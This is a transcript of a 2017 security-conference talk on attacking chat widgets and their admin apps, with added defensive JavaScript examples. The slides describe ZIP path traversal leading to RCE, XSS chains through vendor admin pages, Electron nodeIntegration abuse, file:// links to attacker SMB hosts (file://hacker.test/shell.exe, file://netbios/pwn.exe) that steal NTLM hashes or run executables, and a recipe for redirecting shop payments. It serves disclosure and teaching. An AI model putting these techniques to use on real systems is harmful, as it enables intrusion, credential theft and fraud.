Chat with a hacker

E K
November 21, 2017

A talk about third-party applications and how they can help us in a pentest.
Topics:
- RCE from file upload
- JavaScript implementation and privileges
- Sad consequence via simple XSS
- Desktop applications (Electron XSS == RCE)
- RCE via scheme file:// and tricks
- A few words about mobile applications, 3rd party SDK and malware


Transcript

  1. Chat with a hacker: Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev.
  2. $ Whoarewe • Egor Karbutov & Alexey Pertsev • Penetration testers @Digital Security • Speakers • Bug Hunters
  3. Agenda • Chats-Chats-Chats • How does it work? • ZIP old tricks • RCE via ZIP • So much XSS • Electron vulnerability • Scheme file:// for your chats • Payment through chats • Mobile Application Chats
  4. Disclaimer • Chat images are taken as examples • All coincidences are accidental
  5-7. Chats-Chats-Chats • What are you talking about? • Another chat?

  8. Chat Types • Social Networks • CMS • Desktop Application • Mobile SDK • Browsers
  9. Does it help us? Pentest! • Increase attack surface • Social engineering attacks • Vulnerabilities in own implementations • Vendor vulnerabilities • User support is on the local network • Lack of (network) segmentation
  10. Chat for browsers. How does it work? JavaScript; CMS = JS
  11. JavaScript «Privileges» • XML HTTP Request • Control of user data • Cookies • Tokens • Sensitive information • HTML replace • Remote update
  12-14. Services

  15. Files • Social engineering attacks? • Will you send EXE files? • We can use a couple of stupid tricks with ZIP
  16. ZIP Bomb: 42 Kb → 24 Gb? 322 Gb? 132 Tb? 4.5 Pb. Hi @sergeybelove from 2014 :)
  17. ZIP Format

  18. ZIP Traversal
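The two ZIP tricks on slides 16 and 18 both live in the local file headers: the entry name decides where an extractor writes, and the claimed sizes decide how much it writes. The following added example (not code from the talk) builds a small archive inline and walks its headers to flag a traversal name and a bomb-like ratio. The archive, its entry names and sizes are constructed for the demo; the 1000:1 ratio threshold is a policy choice, not a standard.

```javascript
// Added example, not code from the talk: walk a ZIP's local file headers and
// flag the two old tricks the slides name, a traversal entry name ("Zip Slip")
// and a bomb-like compression ratio. Plain Node.js, no dependencies.
// The archive below is constructed here; its names and sizes are made up.

const LOCAL_HEADER_SIG = 0x04034b50; // bytes 50 4b 03 04, "PK\x03\x04"
const LOCAL_HEADER_LEN = 30;

// Build one local file header followed by its (stored, method 0) data.
// The sizes are whatever the header claims, exactly as in a real ZIP: an
// attacker writes the header, so nothing in it can be trusted.
function localEntry(name, data, claimedUncompressed) {
  const nameBuf = Buffer.from(name, 'utf8');
  const h = Buffer.alloc(LOCAL_HEADER_LEN);
  h.writeUInt32LE(LOCAL_HEADER_SIG, 0);
  h.writeUInt16LE(20, 4);                      // version needed to extract
  h.writeUInt16LE(0, 6);                       // general purpose bit flag
  h.writeUInt16LE(0, 8);                       // compression method: stored
  h.writeUInt16LE(0, 10);                      // last mod time
  h.writeUInt16LE(0, 12);                      // last mod date
  h.writeUInt32LE(0, 14);                      // crc32 (not checked here)
  h.writeUInt32LE(data.length, 18);            // compressed size
  h.writeUInt32LE(claimedUncompressed === undefined ? data.length : claimedUncompressed, 22);
  h.writeUInt16LE(nameBuf.length, 26);         // file name length
  h.writeUInt16LE(0, 28);                      // extra field length
  return Buffer.concat([h, nameBuf, data]);
}

// Constructed sample: a harmless entry, a traversal entry like the one on the
// RCE slides, and a 100-byte entry that claims to inflate to 4 GB.
const SAMPLE_ZIP = Buffer.concat([
  localEntry('cat.png', Buffer.from('not really a png')),
  localEntry('../../../../../../../shell.exe', Buffer.from('MZ...')),
  localEntry('bomb.bin', Buffer.alloc(100), 4000000000),
]);

function isTraversal(name) {
  // Any ".." segment, an absolute path or a drive letter escapes the target dir.
  const segments = name.split(/[\\/]/);
  return segments.includes('..') || /^([A-Za-z]:|[\\/])/.test(name);
}

// Walk local headers in order and report each entry with its issues.
// maxRatio is a policy knob: 1000:1 is already far beyond what real data
// compresses to; 42 KB -> 4.5 PB on the slide is about 10^11:1.
function scanZip(buf, maxRatio = 1000) {
  const entries = [];
  let off = 0;
  while (off + LOCAL_HEADER_LEN <= buf.length && buf.readUInt32LE(off) === LOCAL_HEADER_SIG) {
    const compressed = buf.readUInt32LE(off + 18);
    const uncompressed = buf.readUInt32LE(off + 22);
    const nameLen = buf.readUInt16LE(off + 26);
    const extraLen = buf.readUInt16LE(off + 28);
    const name = buf.toString('utf8', off + LOCAL_HEADER_LEN, off + LOCAL_HEADER_LEN + nameLen);
    const issues = [];
    if (isTraversal(name)) issues.push('traversal');
    // 0xFFFFFFFF means "see the zip64 extra field": treat that as suspicious too.
    if (uncompressed === 0xffffffff || (compressed > 0 && uncompressed / compressed > maxRatio)) {
      issues.push('bomb');
    }
    entries.push({ name, compressed, uncompressed, issues });
    off += LOCAL_HEADER_LEN + nameLen + extraLen + compressed;
  }
  return entries;
}
```

The header-declared sizes are attacker-controlled, so this scan is a pre-check, not the defence: an extractor still has to cap the bytes it actually inflates per entry and in total, and resolve every entry path against the destination directory before opening a file for writing. Nested archives (a ZIP of ZIPs) need the same limits applied recursively.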

  19-26. Let’s send a file. Actors: User interface, storage.service.test, api.service.test, Operator standalone program. Flow: the user sends the file cat.png → storage keeps it under an id (cat.png == id) → the API emits a File Message with file_path = “/file/id” → the operator program builds the URL as Concat(‘https://storage.service.test', file_path) → it downloads the file with GET /file/id HTTP/1.1, Host: storage.service.test → the file is written to %Downloads%/cat.png.
  27-35. RCE via File. Same actors, but now the hacker controls the File Message: file_path = “.hacker.site/file/id” and the id is “../../../../../../../shell.exe”. Concat(‘https://storage.service.test', file_path) now yields a URL on storage.service.test.hacker.site, a host the hacker owns → the operator program downloads it with GET /file/id HTTP/1.1, Host: storage.service.test.hacker.site → the id's traversal sequence is joined onto %Downloads%, so shell.exe is written outside the downloads folder, at a path of the hacker's choosing.
  36. XSS • XSS is the maximum impact • High level of message security • Not obvious places • Headers • GET/POST parameters for analytics • Our target is the Admin page or statistics page
  37. Headers for XSS • User-Agent • Referer • Cookie • Origin • Custom Headers
  38. Parameters for XSS • Methods • GET • POST • WebSocket. Keep it simple. Use gray box analysis!
  39. Admin & Statistic Page • Waiting for someone to visit this page • Abuse of complaints against administrators
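Slides 36-39 list where the reflected input hides (request headers, analytics parameters) and where it surfaces (the admin or statistics page that someone else views later). The added example below (not from the talk) is a gray-box probe for exactly that: each header and parameter carries its own canary, so the string that later appears on the admin page identifies the input and shows whether it was escaped. The host, the parameter names and the sample page HTML are constructed for the demo.

```javascript
// Added example, not from the talk: a gray-box probe for the "not obvious
// places" on slides 36-39. Every header and analytics parameter gets its own
// canary, so that when you later open the admin or statistics page the string
// that appears tells you which input reached it and whether it was HTML-escaped
// on the way. Plain Node.js; the host, the parameter names and the sample page
// are constructed for the demo.

const PROBE_HEADERS = ['User-Agent', 'Referer', 'Origin', 'X-Forwarded-For'];
const PROBE_PARAMS = ['utm_source', 'utm_campaign'];   // assumed analytics parameters

// The marker mixes the three characters an HTML escaper must neutralise; the
// label and nonce make each hit attributable to one input of one request.
function makeCanary(label, nonce) {
  return `'"<xss-${label}-${nonce}>`;
}

// Produce a raw HTTP/1.1 request with a canary in each probed place, and the
// map of input -> canary to scan the admin page with afterwards.
function buildProbeRequest(host, basePath, nonce, headers = PROBE_HEADERS, params = PROBE_PARAMS) {
  const canaries = {};
  const query = new URLSearchParams();
  for (const p of params) {
    const c = makeCanary(p, nonce);
    canaries[`param:${p}`] = c;
    query.set(p, c);                       // browser-style percent-encoding
  }
  const lines = [`GET ${basePath}?${query.toString()} HTTP/1.1`, `Host: ${host}`];
  for (const h of headers) {
    const c = makeCanary(h.toLowerCase(), nonce);
    canaries[`header:${h}`] = c;
    lines.push(`${h}: ${c}`);
  }
  return { raw: lines.join('\r\n') + '\r\n\r\n', canaries };
}

// Scan page HTML for each canary: a raw '<xss-...>' surviving means the input
// is written into the page unescaped; the entity-encoded form means it was escaped.
function findCanaries(html, canaries) {
  const hits = [];
  for (const [input, c] of Object.entries(canaries)) {
    const tag = c.slice(c.indexOf('<'));                       // '<xss-user-agent-nonce>'
    const escaped = tag.replace('<', '&lt;').replace('>', '&gt;');
    if (html.includes(tag)) hits.push({ input, escaped: false });
    else if (html.includes(escaped)) hits.push({ input, escaped: true });
  }
  return hits;
}

// Constructed statistics page: one visitor row where the browser string was
// written raw and the referrer and utm_source were escaped.
const SAMPLE_STATS_HTML = [
  '<table><tr><th>Browser</th><th>Came from</th><th>Source</th></tr>',
  '<tr><td>\'"<xss-user-agent-k9z2></td>',
  '<td>&#39;&quot;&lt;xss-referer-k9z2&gt;</td>',
  '<td>&#39;&quot;&lt;xss-utm_source-k9z2&gt;</td></tr></table>',
].join('\n');
```

The nonce should be unique per request so that hits on a page viewed days later can still be tied to the request that planted them; an unescaped hit is the place to come back to with a real payload, and an escaped hit in one context (an HTML text node) still deserves a second look if the same value is also used inside an attribute or a script block.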
  40. The sad consequences • XSS into chat settings • Appearance customisation • Fonts • Labels • Color • Image • etc.
  41-48. Attack scheme №1. Parties: Evil Hacker, pentest_client.shop.test, statistic_vendor.chat.test, admin_vendor.chat.test. Steps: XSS attack on the chat on pentest_client.shop.test → XSS attack on the client's admins (statistic_vendor.chat.test, admin_vendor.chat.test) → JS code injection into the chat settings → the injected code fires as XSS for any user of the site pentest_client.shop.test.
  49-57. Attack scheme №2. Parties: Evil Hacker, chat.vendor, statistic.chat.vendor, admin.chat.vendor. Steps: XSS attack on the chat (chat.vendor) → XSS attack on the vendor's admins (statistic.chat.vendor, admin.chat.vendor) → JS code injection into the chat settings → XSS for any user on the site → XSS for any user on all chat clients (statistic_vendor.chat.test, admin_vendor.chat.test, chat.test: all of the chat vendor's client services).
  58. Electron • Open-source framework to build desktop apps using HTML, CSS and JavaScript • Electron accomplishes this by combining Chromium and Node.js into a single runtime • Chat vendors use Electron for admin desktop applications
  59. Electron Threat Model • Electron Threat Model = Browser Threat Model • Untrusted content from the web • SOP bypass • Control whether access to Node.js primitives is allowed from JavaScript • Potential access to Node.js primitives • Limited sandbox • XSS == RCE. References: https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf and https://blog.doyensec.com/2017/08/03/electron-framework-security.html
  60. Electron sandbox bypass (Electron 1.6.7) • nodeIntegration = true
  61. Electron sandbox bypass • nodeIntegration = true • Misconfiguration • SOP bypass via presence of privileged URLs • Switch it to false
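Slides 59-61 come down to a handful of BrowserWindow settings: with nodeIntegration on, an XSS in rendered chat content gets require() and therefore the operating system; "switch false" is the fix, and context isolation and the sandbox close the remaining gaps. The added example below (not code from the talk or from Electron) audits a window's webPreferences against that model and rewrites a weak config into the hardened one. It runs in plain Node.js with no Electron installed; the defaults it fills in are those of the Electron 1.x line the slides mention (nodeIntegration on unless switched off, no context isolation, no sandbox).

```javascript
// Added example, not code from the talk or from Electron: a static audit of
// BrowserWindow webPreferences against the threat model on the slides. It runs
// in plain Node.js so it needs no Electron install; the defaults it fills in are
// those of the Electron 1.x line the slides mention (nodeIntegration on unless
// switched off, no context isolation, no sandbox).

const ELECTRON_1X_DEFAULTS = {
  nodeIntegration: true,
  contextIsolation: false,
  sandbox: false,
  webSecurity: true,
  allowRunningInsecureContent: false,
};

// Each finding says what the setting lets an XSS in rendered chat content do.
function auditWebPreferences(webPreferences) {
  const p = Object.assign({}, ELECTRON_1X_DEFAULTS, webPreferences || {});
  const findings = [];
  if (p.nodeIntegration) {
    findings.push({ key: 'nodeIntegration', detail: 'page JavaScript can call require(); XSS == RCE' });
  }
  if (!p.contextIsolation) {
    findings.push({ key: 'contextIsolation', detail: 'page scripts share a JS world with preload scripts' });
  }
  if (!p.sandbox) {
    findings.push({ key: 'sandbox', detail: 'renderer runs without the Chromium OS sandbox' });
  }
  if (!p.webSecurity) {
    findings.push({ key: 'webSecurity', detail: 'same-origin policy disabled' });
  }
  if (p.allowRunningInsecureContent) {
    findings.push({ key: 'allowRunningInsecureContent', detail: 'http:// scripts allowed on https:// pages' });
  }
  return findings;
}

// Convenience: just the keys, for a quick pass/fail in a build step.
function auditWindowOptions(options) {
  return auditWebPreferences((options || {}).webPreferences).map(f => f.key);
}

// Rewrite a window config to the safe settings while keeping everything else
// (size, title, preload path) untouched.
function hardenWindowOptions(options) {
  const wp = Object.assign({}, (options || {}).webPreferences || {}, {
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
    webSecurity: true,
    allowRunningInsecureContent: false,
  });
  return Object.assign({}, options, { webPreferences: wp });
}

// The two configurations side by side: what slide 60 describes, and the
// "switch false" of slide 61 together with the isolation settings.
const WEAK_WINDOW = { width: 1200, height: 800, webPreferences: { nodeIntegration: true } };
const HARDENED_WINDOW = hardenWindowOptions(WEAK_WINDOW);
```

With nodeIntegration off the renderer is back to the browser threat model of slide 59: an XSS still gets everything slide 11 lists (cookies, tokens, the chat's own API), and a preload script that exposes a broad bridge to the page can reopen the path to Node, which is the "misconfiguration" line on slide 61. The audit therefore belongs next to a review of what the preload actually exposes.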
  62. File:// • Typically used to retrieve files from networks and local disks • Vulnerabilities in the wild • Local File Inclusion • XXE • SSRF • Windows context • NTLM hash stealing • NTLM relay • RCE
  63. Chats with File:// • Admin desktop application for Windows • The file:// scheme is available • A file:// link is rendered as a hyperlink
  64. Chats with File:// • pentest_client.shop.test → Admin desktop application → Hacker SMB: the hacker sends a file:// link (file://hacker.test/), the admin's desktop application sends the NTLM hash to the hacker's SMB server, which enables hash cracking or SMB relay • Pentest in the local network • RCE on client devices and servers • Weak & duplicate passwords (local services, servers, client devices)
  65. Tricks with File:// №1 • What can we do? • File:// with local files • file://C:/Windows/System32/calc.exe • But we can't pass arguments: file://C:/Windows/System32/cmd.exe /C calc • Every symbol in the file link is part of the path • It is only useful for social engineering attacks • You can combine this with the directory traversal ZIP trick
  66. Tricks with File:// №2 • File:// with executable files from the Internet (hacker's SMB server) • file://internet_IP/pwn.exe
  67. Chats with File:// • pentest_client.shop.test → Admin desktop application → Hacker SMB: the hacker sends a file:// link to an executable (file://hacker.test/shell.exe); clicking on the link makes the admin OS download shell.exe and execute it • Pentest of the Internet service and the local network • RCE on the client device • Social engineering attacks + file://local_files
  68. Tricks with File:// №3 • How to bypass the Windows alert window? • “This file is in a location outside your local network” • Easy, I'll use local addresses: 10.0.0.0-10.255.255.255, 172.16.0.0-172.31.255.255, 192.168.0.0-192.168.255.255 • No, it doesn't work
  69. Tricks with File:// №3 • “Local network” for Windows means servers with a NetBIOS name • NetBIOS name: a domain name without a dot • If I use the NetBIOS name “netbios” instead of a local IP, I can bypass that alert • file://netbios/pwn.exe • How? • smbd (Samba) server + responder -d netbios -I eth0 • Works only in local networks
  70. Chats with File:// • NetBIOS name trick in the local network • Without the alert window: pentest_client.shop.test → Admin desktop application → Hacker SMB: the hacker sends a file:// link to an executable (file://netbios/pwn.exe); clicking on the link makes the admin OS download and execute shell.exe
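Slides 65-70 make two observations about file:// links that a chat client can check for itself before it turns one into a hyperlink: everything after the scheme is path, so "cmd.exe /C calc" never becomes arguments; and a UNC-style host without a dot (a NetBIOS name) is what Windows treats as "local network", while a dotted host or an IP gets the "outside your local network" warning. The added example below (not from the talk) parses a link with the WHATWG URL parser and reproduces both; the hostnames are the slides' examples and the zone rule is the one the slides state, not a full model of Windows security zones.

```javascript
// Added example, not from the talk: inspect a file:// link the way a chat
// client should before rendering it as a hyperlink, reproducing the two
// observations from the slides: everything after the scheme is path (so
// "cmd.exe /C calc" never becomes arguments), and a UNC-style host with no dot
// (a NetBIOS name) is what Windows treats as "local network", while a dotted
// host or IP gets the "outside your local network" warning. Plain Node.js;
// the hostnames are the slides' examples.

function inspectFileLink(link) {
  let u;
  try {
    u = new URL(link);
  } catch (e) {
    return { ok: false, reason: 'unparseable' };
  }
  if (u.protocol !== 'file:') return { ok: false, reason: 'not a file: link' };

  // WHATWG parsing: "file://C:/x" has an empty host and the drive in the path;
  // "file://hacker.test/x" has a host and means the UNC path \\hacker.test\x.
  const host = u.hostname;
  const decodedPath = decodeURIComponent(u.pathname).replace(/^\/(?=[A-Za-z]:)/, '');

  let zone;
  if (host === '') zone = 'local-file';
  else if (host.includes('.')) zone = 'internet';   // dotted name or IP: warning dialog, per slide 68
  else zone = 'intranet';                            // dotless NetBIOS name: no warning, per slide 69

  return {
    ok: true,
    host,
    path: decodedPath,
    unc: host !== '' ? `\\\\${host}${decodedPath.replace(/\//g, '\\')}` : null,
    zone,
    // Whitespace stays inside the path, so there is no argument vector.
    argumentsPossible: false,
  };
}

// Policy a chat client can apply to incoming links: only http(s) become
// hyperlinks; file:// (and anything else) stays plain text.
function allowAsHyperlink(link) {
  try {
    const p = new URL(link).protocol;
    return p === 'http:' || p === 'https:';
  } catch (e) {
    return false;
  }
}
```

The zone field is only the slides' heuristic; the practical decision for a chat client is the second function: refuse to linkify file:// at all, since a UNC link already leaks the NTLM exchange on hover or click (slide 64) before any executable is involved.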
  71. Add payment system. Useful? Be careful where you store configs!
  72-77. Hacker can buy an iPhone for free. Shop backend: POST /pay?params=1 with shopId, customer, sum, item, … → redirect to the payment page → checkURL answers YES → avisoURL → iPhone X is handed over. On the slide the Evil Hacker is the one calling checkURL and avisoURL.
  78. Stealing money for hackers. POST /pay?params=1 • shopId • customer • sum • item • … Steps to take profit: • Register your own shop with a similar name • Change the shopId via XSS • Call checkURL and avisoURL as needed • All payments go to the hacker! Protection: • Check Yandex IPs • Add an anti-CSRF token to the config form • DO NOT SHOW ANY PASSWORDS, EVER
  79. Mobile Application SDK • Custom code for native applications • All code has only one set of privileges in the mobile OS • 3rd party applications have full access inside your app • Change the user interface • Access to local files in the app folder • Access to dynamic user data • Change app logic (like tapjacking) • Vulnerabilities • Custom implementations • WebView JS manipulation (Android): https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
  80. ExpensiveWall • ExpensiveWall is spread to different apps as an SDK called “gtk” • ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers such as MAC and IP addresses, IMSI and IMEI • Total downloads of infected applications = 5,904,511. https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
  81. Don't forget about • Farms that inflate application ratings • Dynamic code execution and code updates • JSPatch (iOS) • Android Runtime • Valid ad SDKs that were vulnerable • Applications with fake (ad) SDKs • Code review of custom SDK code
  82. Conclusion • For pentest and red team: increase your attack surface via 3rd party services and program libraries • For you and your project: think about how much you trust other people's implementations, the applications on your devices and the plugins in your programs • Don't forget about code review! • All vulnerabilities were reported and fixed
  83. Questions? @ShikariSenpai @_p4lex Egor Karbutov, Alexey Pertsev. Special THX to @cherboff and @barracud4_